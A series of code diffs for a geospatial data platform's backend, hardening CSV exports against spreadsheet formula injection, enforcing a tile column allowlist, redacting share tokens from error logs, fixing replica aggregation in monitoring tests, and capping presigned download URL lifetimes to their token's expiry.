@@ -542,4 +577,5 @@ async def run_ogr2ogr_export(
             _harden_csv_formulas,
             output_path,
             time.monotonic() + export_subprocess_timeout_seconds(deadline),
+            numeric_columns,
         )

--- a/backend/app/processing/export/ogr.py
+++ b/backend/app/processing/export/ogr.py
@@ -2,12 +2,14 @@
 
 import asyncio
 import math
+import csv
 import os
 import time
 
 import structlog
 
 from app.core.config import settings
+from app.core.csv_safety import escape_csv_formula
 
 # fix(#909): build_pg_conn_str is deliberately NOT imported at module scope.
 # The test fixture redirects app.processing.ingest.ogr.build_pg_conn_str at
@@ -288,6 +290,54 @@ def bbox_where_sql(bbox: list[float], *, literal: bool = False) -> str:
     return envelope(minx, maxx)
 
 
+# fix(#1778): ogr2ogr writes every attribute value verbatim and there is no
+# validation on the writer side either -- features/service.py regex-checks the
+# column NAME and binds the value straight through. The export route is
+# anonymous-reachable for a public dataset and records/service.py publishes
+# `?format=csv` as a first-class DCAT distribution ("CSV Download"), so an
+# editor on one public dataset writes a cell and any visitor who opens the
+# advertised download executes it. The two sibling CSV writers in this
+# repository have carried the escape for a long time; this one is the exposed
+# CSV in the product and had none.
+#
+# A post-pass rather than a driver option: ogr2ogr has no layer-creation option
+# for this, and the export already writes to a temp file it hashes for the
+# artifact cache, so a rewrite fits where the hash is not yet taken.
+_CSV_FIELD_SIZE_LIMIT = 2**31 - 1
+
+
+def _harden_csv_formulas(output_path: str) -> None:
+    """Rewrite a just-written CSV with every formula-triggering cell escaped.
+
+    Row at a time, so memory is bounded by the widest row rather than by the
+    file. The rewrite costs one extra read and write of the artifact and a
+    transient second copy on disk; both are small beside the ogr2ogr run and
+    the object-store upload that follows.
+
+    The reader's field-size limit is raised and never lowered: a WKT geometry
+    for a detailed polygon passes csv's 128 KiB default easily, and lowering it
+    again would be a process-global change racing any concurrent export.
+    """
+    if csv.field_size_limit() < _CSV_FIELD_SIZE_LIMIT:
+        csv.field_size_limit(_CSV_FIELD_SIZE_LIMIT)
+
+    # Preserve the line ending GDAL chose rather than imposing csv's CRLF
+    # default on a file a client may diff or checksum.
+    with open(output_path, "rb") as probe:
+        head = probe.read(8192)
+    terminator = "\r\n" if b"\r\n" in head else "\n"
+
+    hardened_path = output_path + ".hardened"
+    with (
+        open(output_path, newline="", encoding="utf-8") as src,
+        open(hardened_path, "w", newline="", encoding="utf-8") as dst,
+    ):
+        writer = csv.writer(dst, lineterminator=terminator)
+        for row in csv.reader(src):
+            writer.writerow([escape_csv_formula(cell) for cell in row])
+    os.replace(hardened_path, output_path)
+
+
 async def run_ogr2ogr_export(
     table_name: str,
     output_path: str,
@@ -437,3 +487,8 @@ async def run_ogr2ogr_export(
         raise ExportError(
             f"ogr2ogr export failed (exit {proc.returncode}): {stderr.decode().strip()}"
         )
+
+    # fix(#1778): see _harden_csv_formulas. Only after a clean exit -- there is
+    # nothing to harden on a failed run, and a partial file is discarded.
+    if format_key == "csv":
+        _harden_csv_formulas(output_path)

--- a/backend/app/processing/export/ogr.py
+++ b/backend/app/processing/export/ogr.py
@@ -1,13 +1,15 @@
 """Async ogr2ogr export subprocess wrapper for PostGIS-to-file conversion."""
 
 import asyncio
-import math
+import contextlib
 import csv
+import math
 import os
 import time
 
 import structlog
 
+from app.core.async_io import run_in_thread_draining
 from app.core.config import settings
 from app.core.csv_safety import escape_csv_formula
 
@@ -305,14 +307,37 @@ def bbox_where_sql(bbox: list[float], *, literal: bool = False) -> str:
 # artifact cache, so a rewrite fits where the hash is not yet taken.
 _CSV_FIELD_SIZE_LIMIT = 2**31 - 1
 
+# fix(#1778 codex r1): how often the pass looks at the clock. A row at a time
+# would put a monotonic() read against every cell batch; 512 rows is small
+# enough that a deadline is honoured within milliseconds on any row width and
+# large enough that the check is noise next to the csv parse.
+_CSV_DEADLINE_CHECK_ROWS = 512
 
-def _harden_csv_formulas(output_path: str) -> None:
+
+def _harden_csv_formulas(output_path: str, hard_deadline: float) -> None:
     """Rewrite a just-written CSV with every formula-triggering cell escaped.
+
+    Blocking. Call it through ``run_in_thread_draining`` -- fix(#1778 codex
+    r1): read-and-rewrite of a multi-million-row artifact is not something to
+    run inline on the event loop, where it would stall every concurrent
+    request in the process for the whole pass. The draining helper is the one
+    the sibling post-processing steps already use (the shapefile ZIP, the
+    GeoPackage timestamp normalization, the artifact hash), and it matters for
+    the same reason here: a cancellation must not free the paths out from
+    under a thread that still holds them open.
 
     Row at a time, so memory is bounded by the widest row rather than by the
     file. The rewrite costs one extra read and write of the artifact and a
-    transient second copy on disk; both are small beside the ogr2ogr run and
-    the object-store upload that follows.
+    transient second copy on disk.
+
+    ``hard_deadline`` is a ``time.monotonic()`` stamp. Passing it means the
+    pass shares the request's budget rather than running unbounded after the
+    subprocess that budget used to be the only thing bounding: an export that
+    would finish after the edge proxy has hung up fails here with an
+    ExportError instead of spending the bytes. The check is cooperative
+    because a thread cannot be killed; the partial rewrite is removed on the
+    way out so the artifact the caller sees is either fully hardened or
+    untouched.
 
     The reader's field-size limit is raised and never lowered: a WKT geometry
     for a detailed polygon passes csv's 128 KiB default easily, and lowering it
@@ -328,13 +353,29 @@ def _harden_csv_formulas(output_path: str) -> None:
     terminator = "\r\n" if b"\r\n" in head else "\n"
 
     hardened_path = output_path + ".hardened"
-    with (
-        open(output_path, newline="", encoding="utf-8") as src,
-        open(hardened_path, "w", newline="", encoding="utf-8") as dst,
-    ):
-        writer = csv.writer(dst, lineterminator=terminator)
-        for row in csv.reader(src):
-            writer.writerow([escape_csv_formula(cell) for cell in row])
+    try:
+        with (
+            open(output_path, newline="", encoding="utf-8") as src,
+            open(hardened_path, "w", newline="", encoding="utf-8") as dst,
+        ):
+            writer = csv.writer(dst, lineterminator=terminator)
+            for index, row in enumerate(csv.reader(src)):
+                if (
+                    index % _CSV_DEADLINE_CHECK_ROWS == 0
+                    and time.monotonic() >= hard_deadline
+                ):
+                    raise ExportError(
+                        "CSV export exceeded the request budget while applying "
+                        "spreadsheet-formula hardening"
+                    )
+                writer.writerow([escape_csv_formula(cell) for cell in row])
+    except BaseException:
+        # Never leave a half-rewritten sibling next to the artifact: the export
+        # temp dir is swept by age, and a partial file here would outlive the
+        # request that made it.
+        with contextlib.suppress(OSError):
+            os.unlink(hardened_path)
+        raise
     os.replace(hardened_path, output_path)
 
 
@@ -490,5 +531,15 @@ async def run_ogr2ogr_export(
 
     # fix(#1778): see _harden_csv_formulas. Only after a clean exit -- there is
     # nothing to harden on a failed run, and a partial file is discarded.
+    #
+    # fix(#1778 codex r1): off the event loop, and under the request's clock.
+    # The budget is re-read here rather than reused from above, so the pass
+    # gets what the subprocess left rather than what the subprocess was
+    # offered, and the post-work reserve stays intact for the hash and the
+    # upload that follow.
     if format_key == "csv":
-        _harden_csv_formulas(output_path)
+        await run_in_thread_draining(
+            _harden_csv_formulas,
+            output_path,
+            time.monotonic() + export_subprocess_timeout_seconds(deadline),
+        )

--- a/backend/app/processing/export/service.py
+++ b/backend/app/processing/export/service.py
@@ -11,6 +11,7 @@ import structlog
 
 from app.core.async_io import run_in_thread_draining
 from app.core.config import settings
+from app.core.csv_safety import numeric_column_names
 from app.processing.export.ogr import FORMAT_MAP, run_ogr2ogr_export
 from app.processing.export.where_validator import validate_where_ast
 from app.core.runtime.staging import ensure_staging_ready
@@ -535,6 +536,11 @@ async def export_dataset(
             # shp branch above can never be pmtiles.
             pmtiles_maxzoom=pmtiles_maxzoom,
             deadline=deadline,
+            # fix(#1778 codex r2): the CSV formula hardening exempts a leading
+            # sign only in a column the database calls numeric, so it needs the
+            # types, not the values. Empty for every other format, and empty
+            # when the caller had no column_info, which escapes everything.
+            numeric_columns=numeric_column_names(column_info),
         )
         if format_key == "gpkg":
             # fix(#1532 review r12): off the event loop, like every other

--- a/backend/app/processing/tiles/service.py
+++ b/backend/app/processing/tiles/service.py
@@ -46,7 +46,8 @@ _COLUMN_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
 # default is deliberately left unchanged. It is NOT all-or-nothing: callers opt
 # specific columns back in at every zoom via `additional_columns` (the runtime
 # `cols=` query param) — see `_select_tile_columns`, which UNIONs them in
-# regardless of this zoom budget. The frontend already opts in data-driven
+# regardless of this zoom budget (but never past an explicit `tile_columns`
+# allowlist, fix(#1778)). The frontend already opts in data-driven
 # styling columns this way; non-styling popup/identify reads at z<10 are the
 # residual tradeoff (export/runtime `cols=` emission is handled separately).
 _DEFAULT_NO_ATTR_BELOW_ZOOM = 10
@@ -247,18 +248,26 @@ def _select_tile_columns(
     requesting client knows it needs — typically data-driven styling
     columns (e.g. `style_config.column`) that must be present at every
     zoom to drive categorical / graduated paint expressions. These are
-    UNIONED into the result regardless of the zoom budget or allowlist,
-    but still validated against `columns` so callers cannot project
-    arbitrary attributes that don't exist on the table. Names that fail
-    `_COLUMN_NAME_RE` or aren't in `columns` are silently dropped.
+    UNIONED into the result regardless of the zoom budget, and validated
+    against `columns` so callers cannot project attributes that don't exist
+    on the table. Names that fail `_COLUMN_NAME_RE` or aren't in `columns`
+    are silently dropped.
+
+    fix(#1778): when `tile_columns` is set, `additional_columns` is also
+    intersected with it, so the three rules above hold for a `cols=` request
+    too. The zoom budget is a default the caller may override; the allowlist
+    is not.
     """
+    allowlist: set[str] | None = None
     if tile_columns is not None:
-        if not tile_columns:
+        # Validated once and reused below: the allowlist bounds the base
+        # selection AND the `cols=` opt-in, so both have to read the same set.
+        allowlist = {name for name in tile_columns if _COLUMN_NAME_RE.match(name)}
+        if not allowlist:
             base = []
         else:
             # Filter `columns` by the allowlist while preserving column
-            # order and dict shape (dtype, etc.) — also re-validate names.
-            allowlist = {name for name in tile_columns if _COLUMN_NAME_RE.match(name)}
+            # order and dict shape (dtype, etc.).
             base = [c for c in columns if c.get("name") in allowlist]
     elif z < _DEFAULT_NO_ATTR_BELOW_ZOOM:
         base = []
@@ -275,6 +284,18 @@ def _select_tile_columns(
             for name in additional_columns
             if isinstance(name, str) and _COLUMN_NAME_RE.match(name)
         }
+        if allowlist is not None:
+            # fix(#1778): `cols=` overrides the ZOOM budget, never the admin
+            # allowlist. It used to union past `tile_columns` as well, which
+            # made the one per-dataset attribute-exposure control on the tile
+            # surface advisory: an operator who set `tile_columns` to [] or to
+            # a narrow list still shipped every other column to any client
+            # that appended `cols=`, including an anonymous holder of a signed
+            # tile template for a non-public dataset, who has no REST route to
+            # those attributes. The published contract on DatasetResponse and
+            # the metadata PATCH schema calls the list absolute; this is the
+            # code agreeing with it.
+            valid_extra &= allowlist
         if valid_extra:
             already = {c.get("name") for c in base}
             for col in columns:
@@ -368,6 +389,12 @@ mvtgeom AS (
     t.gid{attr_columns}
     FROM {qualified_table} t, bounds
     WHERE t.geom_4326 && bounds.geom_4326
+    -- fix(#1778): deterministic under the feature cap, matching the cluster
+    -- query's candidate CTE. Without an ordering a tile whose bbox selects
+    -- more than {_TILE_FEATURE_LIMIT} rows returns an arbitrary subset, so
+    -- successive rebuilds flip the content-hash ETag and each uvicorn worker
+    -- can hold a different rendering of the same tile in its own cache.
+    ORDER BY t.gid
     LIMIT {_TILE_FEATURE_LIMIT}
 )
 SELECT ST_AsMVT(mvtgeom.*, $4::text, 4096, 'geom', 'gid')
@@ -637,6 +664,9 @@ grouped AS (
         OR ($3::integer = 0 AND anchored.anchor_y <= ST_YMax(bounds.geom))
       )
     GROUP BY bucket_x, bucket_y
+    -- fix(#1778): same determinism rule as the vector query above -- the cap
+    -- has to pick the same cells every rebuild.
+    ORDER BY bucket_x, bucket_y
     LIMIT {_TILE_FEATURE_LIMIT}
 ),
 features AS (

--- a/backend/app/standards/ogc/errors.py
+++ b/backend/app/standards/ogc/errors.py
@@ -13,6 +13,7 @@ from fastapi.responses import JSONResponse
 from pydantic import BaseModel, ConfigDict
 from starlette.exceptions import HTTPException as StarletteHTTPException
 
+from app.core.logging_config import safe_access_log_path
 from app.core.url_redaction import redact_query_credentials
 from app.standards.ogc.utils import standards_api_path
 
@@ -348,7 +349,10 @@ def register_error_handlers(app: FastAPI) -> None:
 
         logger.exception(
             "Unhandled error",
-            path=request.url.path,
+            # fix(#1778): same capability-in-the-path rule the access log has
+            # followed since #821 -- a 500 on /api/maps/shared/{token} used to
+            # write the token verbatim.
+            path=safe_access_log_path(request.url.path),
             method=request.method,
             query=redact_query_credentials(str(request.url.query))
             if request.url.query

--- a/backend/tests/test_access_log_path_redaction.py
+++ b/backend/tests/test_access_log_path_redaction.py
@@ -18,8 +18,13 @@ from app.api.middleware.logging import safe_access_log_path
             "/api/maps/shared/SYNTHETIC_SENTINEL/card",
             "/api/maps/shared/[REDACTED]/card",
         ),
+        # fix(#1778): the embed shell, which frontend/nginx.conf has always
+        # redacted at the edge and the Python regex did not.
+        ("/m/SYNTHETIC_SENTINEL", "/m/[REDACTED]"),
+        ("/m/SYNTHETIC_SENTINEL/anything", "/m/[REDACTED]/anything"),
         ("/maps/ordinary-map-id", "/maps/ordinary-map-id"),
         ("/maps/shared", "/maps/shared"),
+        ("/m/", "/m/"),
     ],
 )
 def test_safe_access_log_path(path: str, expected: str) -> None:
@@ -67,3 +72,26 @@ async def test_access_log_never_contains_query_credentials(monkeypatch) -> None:
     assert "SYNTHETIC_KEY_SENTINEL" not in logged
     assert "api_key" not in logged
     assert events[0][1]["path"] == "/things"
+
+
+def test_the_two_5xx_handlers_redact_the_path_they_log() -> None:
+    """fix(#1778): a 500 or a 503 must not publish a share capability.
+
+    Both handlers logged ``request.url.path`` raw, so the access-log line for
+    a failing ``/api/maps/shared/{token}`` request was redacted while the
+    error line beside it carried the token in full. Asserted on the source so
+    the check does not depend on provoking a DB failure inside a request.
+    """
+    import inspect
+
+    from app.api.main import _database_error_handler
+    from app.standards.ogc.errors import register_error_handlers
+
+    for fn in (_database_error_handler, register_error_handlers):
+        src = inspect.getsource(fn)
+        assert "path=request.url.path," not in src, (
+            f"{fn.__qualname__} logs an unredacted request path"
+        )
+        assert "safe_access_log_path(request.url.path)" in src, (
+            f"{fn.__qualname__} must route its logged path through the redactor"
+        )

--- a/backend/tests/test_alert_rules.py
+++ b/backend/tests/test_alert_rules.py
@@ -30,6 +30,7 @@ structure, and runs wherever the backend suite runs.
 from __future__ import annotations
 
 import collections
+import json
 import pathlib
 import re
 from typing import Any
@@ -43,6 +44,7 @@ REPO_ROOT = pathlib.Path(__file__).parent.parent.parent
 ALERTS_PATH = REPO_ROOT / "infra" / "monitoring" / "alerts.yml"
 ALERTS_TEST_PATH = REPO_ROOT / "infra" / "monitoring" / "alerts.test.yml"
 PROMETHEUS_PATH = REPO_ROOT / "infra" / "monitoring" / "prometheus.yml"
+DASHBOARD_PATH = REPO_ROOT / "infra" / "monitoring" / "grafana-dashboard.json"
 
 # fix(#1778): metrics whose value is produced per PROCESS rather than read
 # from shared state. The job counters are incremented inside whichever worker
@@ -52,6 +54,14 @@ PROMETHEUS_PATH = REPO_ROOT / "infra" / "monitoring" / "prometheus.yml"
 # same procrastinate_jobs rows, so they all report the same number and
 # `max by (queue)` is right for them.
 PER_PROCESS_JOB_COUNTERS = ("geolens_jobs_completed_total", "geolens_jobs_failed_total")
+
+# fix(#1778 codex r8): the gauges in the same family, which need the OTHER
+# aggregator. Every replica polls the same procrastinate_jobs rows and reports
+# the same number, so `max by (queue)` reads one queue's depth while
+# `sum by (queue)` would multiply it by the replica count. Bare, they draw N
+# identically labelled overlapping lines -- the same defect as the counters,
+# with a different fix.
+PER_REPLICA_JOB_GAUGES = ("geolens_jobs_queue_depth", "geolens_jobs_active")
 
 # Bulk reads: the response is whatever the caller asked for, so over a second is
 # the cost of the payload rather than a symptom. Excluded from the interactive
@@ -527,4 +537,107 @@ def test_the_reference_scrape_config_discovers_every_worker_replica():
     assert not single_targets, (
         "the worker job still carries a single static target beside its "
         f"discovery block: {single_targets}"
+    )
+
+
+# ---------------------------------------------------------------------------
+# fix(#1778 codex r8): the dashboard reads the same per-replica series
+# ---------------------------------------------------------------------------
+
+
+def _dashboard_targets() -> list[tuple[str, str]]:
+    """(panel title, expr) for every target in the shipped dashboard."""
+    dashboard = json.loads(DASHBOARD_PATH.read_text())
+    targets: list[tuple[str, str]] = []
+    for panel in dashboard.get("panels", []):
+        title = panel.get("title", "<untitled>")
+        for target in panel.get("targets", []):
+            expr = target.get("expr")
+            if expr:
+                targets.append((title, expr))
+    assert targets, f"no panel targets parsed out of {DASHBOARD_PATH.name}"
+    return targets
+
+
+def test_dashboard_aggregates_the_per_replica_job_counters():
+    """A bare rate() draws one partial line per worker replica.
+
+    Round 4 made the worker scrape job discover every replica, so each exports
+    its own completed/failed series for the same queue. The alert sums them;
+    the panel showed several identically named partial rates until it did too.
+    """
+    matched = []
+    for title, expr in _dashboard_targets():
+        for counter in PER_PROCESS_JOB_COUNTERS:
+            if counter not in expr:
+                continue
+            matched.append((title, counter))
+            sum_at = expr.find("sum by")
+            fn_at = min(
+                (expr.find(fn) for fn in ("increase(", "rate(") if fn in expr),
+                default=-1,
+            )
+            assert sum_at != -1, (
+                f"dashboard panel {title!r} reads {counter}, which is exported "
+                "per worker replica, without a `sum by`"
+            )
+            assert fn_at != -1, (
+                f"dashboard panel {title!r} reads the counter {counter} without "
+                "a range function"
+            )
+            assert sum_at < fn_at, (
+                f"dashboard panel {title!r} must aggregate OUTSIDE the range "
+                "function: `sum by (queue) (rate(...[15m]))`"
+            )
+
+    assert matched, (
+        "no dashboard panel reads any of "
+        f"{PER_PROCESS_JOB_COUNTERS} -- this test would pass vacuously"
+    )
+
+
+def test_dashboard_aggregates_the_per_replica_job_gauges():
+    """The gauges need `max by`, not `sum by`: summing multiplies the depth."""
+    matched = []
+    for title, expr in _dashboard_targets():
+        for gauge in PER_REPLICA_JOB_GAUGES:
+            if gauge not in expr:
+                continue
+            matched.append((title, gauge))
+            assert "max by" in expr, (
+                f"dashboard panel {title!r} reads {gauge} bare; with several "
+                "worker replicas that is N identical overlapping lines"
+            )
+            assert "sum by" not in expr, (
+                f"dashboard panel {title!r} sums {gauge}, which multiplies one "
+                "queue's depth by the replica count"
+            )
+
+    assert matched, (
+        f"no dashboard panel reads any of {PER_REPLICA_JOB_GAUGES} -- "
+        "this test would pass vacuously"
+    )
+
+
+def test_no_alert_or_panel_reads_a_job_series_without_aggregating():
+    """The sweep, over both files at once.
+
+    Every expression anywhere in infra/monitoring that names a job metric has
+    to say how it combines the replicas. Written as one pass so a metric added
+    to one file and not the other cannot slip through.
+    """
+    job_metrics = PER_PROCESS_JOB_COUNTERS + PER_REPLICA_JOB_GAUGES
+    sources = [(f"alert {name}", rule["expr"]) for name, rule in _load_rules().items()]
+    sources += [(f"panel {title!r}", expr) for title, expr in _dashboard_targets()]
+
+    offenders = [
+        (where, expr)
+        for where, expr in sources
+        if any(metric in expr for metric in job_metrics)
+        and "sum by" not in expr
+        and "max by" not in expr
+    ]
+    assert not offenders, (
+        "job metrics read without an aggregator, so each worker replica draws "
+        f"its own series: {offenders}"
     )

--- a/backend/tests/test_alert_rules.py
+++ b/backend/tests/test_alert_rules.py
@@ -42,6 +42,16 @@ from app.observability.metrics import LATENCY_LOWR_BUCKETS
 REPO_ROOT = pathlib.Path(__file__).parent.parent.parent
 ALERTS_PATH = REPO_ROOT / "infra" / "monitoring" / "alerts.yml"
 ALERTS_TEST_PATH = REPO_ROOT / "infra" / "monitoring" / "alerts.test.yml"
+PROMETHEUS_PATH = REPO_ROOT / "infra" / "monitoring" / "prometheus.yml"
+
+# fix(#1778): metrics whose value is produced per PROCESS rather than read
+# from shared state. The job counters are incremented inside whichever worker
+# replica performed the terminal transition, so each replica exports its own
+# series for the same queue and any alert over them has to aggregate. The
+# gauges in the same family are the opposite case -- every replica polls the
+# same procrastinate_jobs rows, so they all report the same number and
+# `max by (queue)` is right for them.
+PER_PROCESS_JOB_COUNTERS = ("geolens_jobs_completed_total", "geolens_jobs_failed_total")
 
 # Bulk reads: the response is whatever the caller asked for, so over a second is
 # the cost of the payload rather than a symptom. Excluded from the interactive
@@ -433,4 +443,88 @@ def test_every_alert_has_a_promtool_case():
     assert not stale, (
         f"{ALERTS_TEST_PATH.name} asserts on alerts that alerts.yml no longer "
         f"defines: {stale}"
+    )
+
+
+def test_alerts_over_per_process_job_counters_aggregate_across_replicas():
+    """fix(#1778): a bare increase() on these is evaluated per series.
+
+    The counters move at the terminal transition, in the worker process that
+    performed it, so several worker replicas each export their own series for
+    one queue. Under a bare `increase(...) > 5`, six failures split three and
+    three across two replicas cross nothing and the alert stays silent while
+    the queue is visibly failing. Every rule over one of these must sum first.
+
+    The check is on the shape rather than on one rule's text, so a future
+    throughput alert on `geolens_jobs_completed_total` cannot ship with the
+    same defect.
+    """
+    rules = _load_rules()
+
+    matched = []
+    for name, rule in rules.items():
+        expr = rule["expr"]
+        for counter in PER_PROCESS_JOB_COUNTERS:
+            if counter not in expr:
+                continue
+            matched.append((name, counter))
+            # `sum by (...)` has to wrap the range function, not sit beside it:
+            # `increase(sum by (queue) (x[15m]))` is not valid PromQL, and
+            # `sum by (queue) (x) > 5` on a counter is a lifetime total rather
+            # than a rate. Require the aggregation and the range function to
+            # appear in that order.
+            sum_at = expr.find("sum by")
+            fn_at = min(
+                (expr.find(fn) for fn in ("increase(", "rate(") if fn in expr),
+                default=-1,
+            )
+            assert sum_at != -1, (
+                f"{name} reads {counter}, which is exported per worker "
+                "replica, without a `sum by` -- PromQL evaluates it per series "
+                "and failures split across replicas never cross the threshold"
+            )
+            assert fn_at != -1, (
+                f"{name} reads the counter {counter} without a range function; "
+                "a raw counter is a lifetime total, not a rate"
+            )
+            assert sum_at < fn_at, (
+                f"{name} must aggregate OUTSIDE the range function: "
+                "`sum by (queue) (increase(...[15m]))`"
+            )
+
+    assert matched, (
+        "no alert reads any of "
+        f"{PER_PROCESS_JOB_COUNTERS} -- this test would pass vacuously. If the "
+        "counters were renamed, update PER_PROCESS_JOB_COUNTERS with them."
+    )
+
+
+def test_the_reference_scrape_config_discovers_every_worker_replica():
+    """fix(#1778): one static worker target is lossy the moment there are two.
+
+    The job counters live in the process that did the work, so a replica
+    nobody scrapes contributes nothing to the sum the alert evaluates and its
+    failures are invisible. The api job stays static on purpose -- its metrics
+    are per-process too, but `UVICORN_WORKERS` runs them behind one address in
+    prometheus_client multiprocess mode, so one target already sees them all.
+    """
+    config = yaml.safe_load(PROMETHEUS_PATH.read_text())
+    jobs = {job["job_name"]: job for job in config["scrape_configs"]}
+    assert "geolens-worker" in jobs, (
+        f"{PROMETHEUS_PATH.name} no longer defines a worker scrape job"
+    )
+
+    worker = jobs["geolens-worker"]
+    discovery = [key for key in worker if key.endswith("_sd_configs")]
+    assert discovery, (
+        "the worker job must discover its targets (a *_sd_configs block), not "
+        "name one: with several replicas a static single target drops every "
+        "other replica's job counters"
+    )
+
+    statics = worker.get("static_configs") or []
+    single_targets = [cfg for cfg in statics if len(cfg.get("targets", [])) == 1]
+    assert not single_targets, (
+        "the worker job still carries a single static target beside its "
+        f"discovery block: {single_targets}"
     )

--- a/backend/tests/test_cog_presign_lifetime_1778.py
+++ b/backend/tests/test_cog_presign_lifetime_1778.py
@@ -16,9 +16,11 @@ import inspect
 import time
 from types import SimpleNamespace
 
+import pytest
+
 from app.modules.catalog.datasets.api.router_export import (
     _COG_PRESIGN_CEILING_SECONDS,
-    _COG_PRESIGN_FLOOR_SECONDS,
+    _COG_PRESIGN_MINIMUM_SECONDS,
     _cog_presign_seconds,
     _resolve_download_user,
     _s3_cog_response,
@@ -32,13 +34,28 @@ def _request_with(exp) -> object:
 def test_the_ceiling_is_on_the_order_of_the_mint_ttl():
     """120s minted, 300s ceiling. 3600 was 30x the window SEC-04 enforces."""
     assert _COG_PRESIGN_CEILING_SECONDS <= 300
-    assert _COG_PRESIGN_FLOOR_SECONDS <= _COG_PRESIGN_CEILING_SECONDS
+
+
+def test_there_is_no_floor_only_sigv4s_own_minimum():
+    """fix(#1778 codex r8): a floor mints a URL that outlives its credential.
+
+    `require_signable_job_lifetime` settled this for the upload doors: there is
+    no `ExpiresIn` value meaning "already dead", so the only way not to hand
+    out a live URL is not to sign one. The minimum here is SigV4's own bound on
+    `X-Amz-Expires`, not a policy choice.
+    """
+    import app.modules.catalog.datasets.api.router_export as module
+
+    assert _COG_PRESIGN_MINIMUM_SECONDS == 1
+    assert not hasattr(module, "_COG_PRESIGN_FLOOR_SECONDS"), (
+        "the floor is the defect; it must not come back under its old name"
+    )
 
 
 def test_presign_expires_with_the_download_token():
     request = _request_with(time.time() + 110)
     seconds = _cog_presign_seconds(request)
-    assert _COG_PRESIGN_FLOOR_SECONDS <= seconds <= 111
+    assert 0 < seconds <= 110
     assert seconds < _COG_PRESIGN_CEILING_SECONDS
 
 
@@ -47,10 +64,67 @@ def test_a_long_lived_deadline_is_still_capped():
     assert _cog_presign_seconds(request) == _COG_PRESIGN_CEILING_SECONDS
 
 
-def test_an_almost_expired_token_still_gets_a_usable_window():
-    """The bucket evaluates the deadline on arrival, and clocks disagree."""
-    request = _request_with(time.time() + 1)
-    assert _cog_presign_seconds(request) == _COG_PRESIGN_FLOOR_SECONDS
+@pytest.mark.parametrize(
+    "remaining", [30.0, 5.0, 2.0, 1.9, 1.0, 0.9, 0.5, 0.0, -0.5, -120.0]
+)
+def test_the_signature_never_outlives_the_token(remaining: float) -> None:
+    """fix(#1778 codex r8): the invariant, across the boundary.
+
+    Signed now for N seconds, the URL dies at now+N, and that must land at or
+    before the token's own expiry. The 60-second floor broke this for every
+    token with under a minute left: one second of credential bought a minute of
+    access to a private COG.
+
+    Stated as raise-or-fit rather than as an outcome per input, because at
+    exactly one second left the answer is a race between this function's clock
+    read and the boundary -- and BOTH outcomes are safe, which is the point. A
+    401 hands out nothing; a 1-second signature dies before the token does.
+    `test_a_live_token_still_gets_a_signature` stops that being satisfied by
+    always raising.
+    """
+    from fastapi import HTTPException
+
+    token_expiry = time.time() + remaining
+    # The clock BEFORE the call bounds the function's own read from below, so
+    # this comparison is exact rather than racing it. Reading it again after
+    # the call would be stricter than the code can be: `ExpiresIn` starts when
+    # the signature is minted, and the residual between reading the clock and
+    # signing is the one `sign_url_with_deadline` documents as irreducible.
+    # Truncation is what covers it here -- int() discards the fraction, which
+    # is headroom in the safe direction.
+    before = time.time()
+    try:
+        signed_for = _cog_presign_seconds(_request_with(token_expiry))
+    except HTTPException as exc:
+        assert exc.status_code == 401
+        assert "expired" in exc.detail.lower()
+        return
+
+    assert signed_for >= _COG_PRESIGN_MINIMUM_SECONDS
+    assert before + signed_for <= token_expiry, (
+        f"a {remaining}s token bought {signed_for}s of bucket access"
+    )
+
+
+@pytest.mark.parametrize("remaining", [2.0, 10.0, 119.0])
+def test_a_live_token_still_gets_a_signature(remaining: float) -> None:
+    """The counterweight: refusing everything would satisfy the invariant."""
+    signed_for = _cog_presign_seconds(_request_with(time.time() + remaining))
+    assert _COG_PRESIGN_MINIMUM_SECONDS <= signed_for <= remaining
+
+
+@pytest.mark.parametrize("remaining", [0.9, 0.0, -0.5, -120.0])
+def test_a_token_with_nothing_left_is_refused_not_rounded_up(
+    remaining: float,
+) -> None:
+    """Below SigV4's one-second minimum there is nothing safe to mint."""
+    from fastapi import HTTPException
+
+    with pytest.raises(HTTPException) as excinfo:
+        _cog_presign_seconds(_request_with(time.time() + remaining))
+
+    assert excinfo.value.status_code == 401
+    assert "expired" in excinfo.value.detail.lower()
 
 
 def test_callers_without_a_download_token_get_the_ceiling():

--- a/backend/tests/test_cog_presign_lifetime_1778.py
+++ b/backend/tests/test_cog_presign_lifetime_1778.py
@@ -1,0 +1,76 @@
+"""fix(#1778): the COG redirect must not outlive the token that authorized it.
+
+The s3 branch of the COG download signed a bucket URL for 3600 seconds. The
+credential that gates the route is deliberately short-lived: POST
+/auth/download-token/{id} mints a typ='download', scope='dataset:{id}' JWT with
+a 120s TTL. The presigned URL carries its SigV4 signature in the query string
+and is bound to neither the caller, the session, nor the dataset grant, so
+revoking the grant, flipping the record to private, disabling the account or
+discarding the token does not invalidate it. The access gate above this branch
+is the full RBAC path, so it is reached for private and internal datasets too.
+"""
+
+from __future__ import annotations
+
+import inspect
+import time
+from types import SimpleNamespace
+
+from app.modules.catalog.datasets.api.router_export import (
+    _COG_PRESIGN_CEILING_SECONDS,
+    _COG_PRESIGN_FLOOR_SECONDS,
+    _cog_presign_seconds,
+    _resolve_download_user,
+    _s3_cog_response,
+)
+
+
+def _request_with(exp) -> object:
+    return SimpleNamespace(state=SimpleNamespace(download_token_exp=exp))
+
+
+def test_the_ceiling_is_on_the_order_of_the_mint_ttl():
+    """120s minted, 300s ceiling. 3600 was 30x the window SEC-04 enforces."""
+    assert _COG_PRESIGN_CEILING_SECONDS <= 300
+    assert _COG_PRESIGN_FLOOR_SECONDS <= _COG_PRESIGN_CEILING_SECONDS
+
+
+def test_presign_expires_with_the_download_token():
+    request = _request_with(time.time() + 110)
+    seconds = _cog_presign_seconds(request)
+    assert _COG_PRESIGN_FLOOR_SECONDS <= seconds <= 111
+    assert seconds < _COG_PRESIGN_CEILING_SECONDS
+
+
+def test_a_long_lived_deadline_is_still_capped():
+    request = _request_with(time.time() + 86400)
+    assert _cog_presign_seconds(request) == _COG_PRESIGN_CEILING_SECONDS
+
+
+def test_an_almost_expired_token_still_gets_a_usable_window():
+    """The bucket evaluates the deadline on arrival, and clocks disagree."""
+    request = _request_with(time.time() + 1)
+    assert _cog_presign_seconds(request) == _COG_PRESIGN_FLOOR_SECONDS
+
+
+def test_callers_without_a_download_token_get_the_ceiling():
+    """Session JWT, API key, or anonymous on a public dataset."""
+    assert _cog_presign_seconds(SimpleNamespace(state=SimpleNamespace())) == (
+        _COG_PRESIGN_CEILING_SECONDS
+    )
+    for junk in (None, "not-a-number", object()):
